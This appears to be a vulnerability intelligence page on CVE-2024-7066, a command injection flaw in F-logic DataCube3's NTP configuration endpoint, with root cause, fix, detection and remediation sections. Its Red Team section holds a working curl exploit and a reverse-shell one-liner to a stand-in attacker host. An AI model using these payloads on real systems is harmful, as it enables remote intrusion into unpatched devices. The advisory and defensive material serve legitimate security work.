CVE-2024-7066
Executive Summary
CVE-2024-7066 is a critical OS command injection vulnerability in F-logic DataCube3 version 1.0. The flaw resides in the /admin/config_time_sync.php endpoint, where the ntp_server parameter is unsanitized before being passed to a system command. An unauthenticated attacker can exploit this remotely to execute arbitrary operating system commands, leading to full compromise of the device. A public proof-of-concept (PoC) exploit has been released, increasing the risk of widespread exploitation. No official patch is available, and the vendor has not responded to disclosure.
This record — and 170,000+ others — are available via the ValtersIT API. One endpoint replaces five: NVD + GitHub CVE + CISA KEV + EPSS + Nuclei + Exploit-DB, unified.

Deep Dive & Mechanics
The vulnerability is a classic OS command injection in the NTP server configuration functionality. The /admin/config_time_sync.php script accepts a POST parameter ntp_server and uses it in a command like ntpdate $ntp_server or similar without proper sanitization. An attacker can inject shell metacharacters (e.g., ;, |, &&) to execute arbitrary commands.
Root Cause: Lack of input validation and failure to use parameterized system calls or escapeshellarg().
Attack Flow:
- Attacker sends a POST request to
/admin/config_time_sync.phpwithntp_server=127.0.0.1;id. - The server executes:
ntpdate 127.0.0.1;id. - The output of
idis returned or can be exfiltrated via reverse shell.
Vulnerable vs. Patched Code
Vulnerable Code (Conceptual):
<?php
$ntp_server = $_POST['ntp_server'];
system("ntpdate $ntp_server");
?>
Patched Code (Conceptual):
<?php
$ntp_server = $_POST['ntp_server'];
$safe_server = escapeshellarg($ntp_server);
system("ntpdate $safe_server");
?>
No official patch exists; the above is a recommended fix.
Exploitation & Lab Setup
Red Team
Exploit PoC (Public):
#!/bin/bash
# CVE-2024-7066 Exploit
TARGET="http://target/admin/config_time_sync.php"
COMMAND="id"
curl -X POST -d "ntp_server=127.0.0.1;$COMMAND" "$TARGET"
Reverse Shell:
curl -X POST -d "ntp_server=127.0.0.1;bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" http://target/admin/config_time_sync.php
Lab Setup:
- Use a vulnerable F-logic DataCube3 firmware (version 1.0) in a VM.
- Network: Attacker and target on same subnet.
- Tools: curl, netcat, Burp Suite.
Blue Team
Detection:
- Monitor POST requests to
/admin/config_time_sync.phpwith suspiciousntp_servervalues containing shell metacharacters. - Alert on outbound connections from the device to unusual IPs/ports (e.g., 4444).
Hunting:
- Search logs for
ntp_serverparameter containing;,|,&&,`. - Check for unexpected processes spawned by the web server (e.g.,
id,bash).
Indicators of Compromise (IOCs)
- Network:
- POST requests to
/admin/config_time_sync.phpwithntp_servercontaining shell metacharacters. - Outbound connections from the device to attacker-controlled IPs on high ports.
- POST requests to
- File System:

Remediation & Mitigation
Immediate Actions:
- Isolate affected devices from the internet and untrusted networks.
- Apply virtual patching via WAF rules blocking
ntp_serverwith shell metacharacters. - Disable the NTP sync functionality if not required.
Long-term Fix:
- Vendor must release a firmware update with proper input sanitization using
escapeshellarg()or parameterized commands. - If no patch is forthcoming, consider replacing the device.
Compensating Controls:
- Restrict access to
/admin/config_time_sync.phpvia IP whitelisting or authentication. - Monitor for exploitation attempts using the provided detection rules.
